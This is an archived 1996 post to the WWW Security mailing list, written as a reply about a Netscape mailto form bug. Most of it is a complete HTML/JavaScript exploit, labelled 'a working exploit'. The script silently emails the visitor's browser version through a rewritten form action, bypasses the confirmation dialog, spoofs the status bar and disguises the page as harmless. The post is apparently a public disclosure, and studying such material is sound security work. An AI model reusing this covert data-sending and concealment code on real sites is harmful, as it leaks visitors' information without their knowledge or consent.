[3322] in WWW Security List Archive
Re:Java Script
daemon@ATHENA.MIT.EDU (htorgema@novice.uwaterloo.ca)
Tue Oct 22 00:11:43 1996
From: htorgema@novice.uwaterloo.ca
Date: Mon, 21 Oct 1996 22:18:47 -0400 (EDT)
Reply-To: htorgema@novice.uwaterloo.ca
To: David Ray <daver@idiom.com>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <v02140b00ae90bda7dcdd@[206.14.80.95]>
Errors-To: owner-www-security@ns2.rutgers.edu
On Sun, 20 Oct 1996, David Ray wrote:
> At 11:17 AM 10/20/96, I wrote:
> > No, this is not correct. This bug existed in the short-lived Netscape
> > version 2.0 which was replaced by version 2.0.1 a long time ago (in Web
> > years).
> >
> > All versions of Netscape since then put up a dialog box asking the user if
> > they are sure they want to send their email message, before it is sent.
>
> To be more specific, Netscape 3.0, under "Options... Network Preferences...
> Protocols... There is a checkbox that says "Show alert before submitting a
> form by email". If checked, it will put up a dialog box if a mailto: URL is
> being submitted, asking the user to confirm or cancel. This checkbox is
> checked by default, but can be unchecked. Perhaps the person who started
> this thread had unchecked it.
>
> -Dave
Alright.. then here's a working exploit:
The following script send automatically a mail.
It was tested with Netscape 3.0 for OSF1 and for AIX.
It visibly doesn't care if the "Show alert before playing with email"
checkbox is set.
The use of a get method and of a text/plain
mime-type seems to be a good enough reason for Netscape to send
mail directly..
This script try to hide its action as much as possible: A look at
view-source when this page is loaded should show a very innocent-looking
page..
---------- Begin of HTML source ----------
<HTML>
<SCRIPT>
<!--
//////////////////////////////////
// First, some silly functions. //
//////////////////////////////////
var kickme;
function hide() {
top.status="I'm loading my world, please wait!";
kickme=setTimeout("hide()",100);
}
function FabulousWorld() {
clearTimeout(kickme);
document.open("text/html");
document.writeln("<HTML><HEAD><TITLE>My World!</TITLE><HEAD>");
document.writeln("<BODY bgcolor=red text=green link=yellow>");
document.writeln("<CENTER><H1> My world... </H1>");
document.writeln("<H3><BLINK>This page is Javascript enabled!</BLINK></H3>");
// Insert your bookmarks here...
document.writeln("</BODY></HTML>");
document.close();
}
///////////////////////////////
// Serious stuff begin here! //
///////////////////////////////
function form_handler() {
document.forms[0].method="get";
document.forms[0].encoding="text/plain";
document.forms[0].action="mailto:daver@idiom.com?subject=a good bug never dies...";
// Remember to put YOUR adress when you test this page...
document.forms[0].text.value="Browser used: "+navigator.appVersion;
setTimeout("FabulousWorld()",12000); // This is not elegant..
// but if we change the page before the mail is sent,
// nothing is sent...
kickme=setTimeout("hide()",100); // This is just a way to
// hide some status
// mentionning an
// access to your
// favorite SMTP server!
}
// Then, we generate a very usual page.
// The only 'unusual' thing is the onsubmit() handler.
document.writeln('\
<HTML>\
<HEAD>\
<TITLE>Welcome in my world!</TITLE>\
</HEAD>\
<BODY bgcolor=black text=yellow>\
<CENTER><H1>Welcome</H1>\
<BR><BR><BR><BR><BR>\
<FONT Color=White>\
<FORM onsubmit="form_handler()" >\
<INPUT type="hidden" name="text">\
<INPUT TYPE="submit" value="Click Here to Enter my Fabulous Realm!" >\
</CENTER>\ </FORM></FONT>\
</BODY>\
</HTML>');
// -->
</SCRIPT>
</HTML>
---------- End of HTML source ----------
---------------
Henri Torgemane http://www.undergrad.math.uwaterloo.ca/~htorgema/
Never let your sense of morals prevent you from doing what is right.
-- Salvor Hardin, "Foundation"
